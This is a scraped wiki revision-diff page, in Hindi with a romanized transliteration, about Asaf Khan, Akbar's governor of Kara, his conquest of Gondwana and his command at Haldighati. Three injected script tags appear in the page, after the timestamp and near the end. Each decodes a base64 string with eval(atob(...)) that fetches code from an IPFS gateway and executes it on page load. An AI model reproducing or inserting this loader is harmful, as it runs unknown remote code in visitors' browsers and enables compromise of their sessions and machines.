Difference between revisions of "आसफ़ ख़ाँ (सूबेदार)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:मुग़ल साम्राज्य (को हटा दिया गया हैं।))
Line 1: Line 1:
 
{{बहुविकल्पी|आसफ़ ख़ाँ}}
 
{{बहुविकल्पी|आसफ़ ख़ाँ}}
*आसफ़ ख़ाँ, बादशाह [[अकबर]] (1556-1605 ई.) के शासनकाल के आरम्भ में [[कड़ा]] का सूबेदार था।
+
*आसफ़ ख़ाँ, बादशाह [[अकबर]] (1556-1605 ई.) के शासनकाल के आरम्भ में [[कड़ा]] का [[सूबेदार]] था।
 
*1564 ई. में उसने अकबर के आदेश से [[गोंडवाना]] का राज्य जीता, जो आधुनिक मध्य प्रदेश के उत्तरी भाग में था।
 
*1564 ई. में उसने अकबर के आदेश से [[गोंडवाना]] का राज्य जीता, जो आधुनिक मध्य प्रदेश के उत्तरी भाग में था।
 
*उसने गोंडवाना की शासिका रानी [[दुर्गावती]] और उसके नाबालिग पुत्र राजा [[वीरनारायण]] को हटाया।
 
*उसने गोंडवाना की शासिका रानी [[दुर्गावती]] और उसके नाबालिग पुत्र राजा [[वीरनारायण]] को हटाया।
Line 6: Line 6:
 
*1576 ई. में उसे राजा [[मानसिंह]] के साथ उस [[मुग़ल]] सेना का सेनापति बनाकर भेजा गया, जिसने [[राणा प्रताप]] को [[हल्दीघाटी]] के युद्ध में अप्रैल 1576 में पराजित किया था।
 
*1576 ई. में उसे राजा [[मानसिंह]] के साथ उस [[मुग़ल]] सेना का सेनापति बनाकर भेजा गया, जिसने [[राणा प्रताप]] को [[हल्दीघाटी]] के युद्ध में अप्रैल 1576 में पराजित किया था।
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 06:39, 2 December 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  • asaf khaan, badashah akabar (1556-1605 ee.) ke shasanakal ke arambh mean k da ka soobedar tha.
  • 1564 ee. mean usane akabar ke adesh se goandavana ka rajy jita, jo adhunik madhy pradesh ke uttari bhag mean tha.
  • usane goandavana ki shasika rani durgavati aur usake nabalig putr raja viranarayan ko hataya.
  • kuchh samay asaf khaan ne naye vijit kshetr ka prashasan chalaya, lekin bad mean vahaan se usaka tabadala kar diya gaya.
  • 1576 ee. mean use raja manasianh ke sath us mugal sena ka senapati banakar bheja gaya, jisane rana pratap ko haldighati ke yuddh mean aprail 1576 mean parajit kiya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>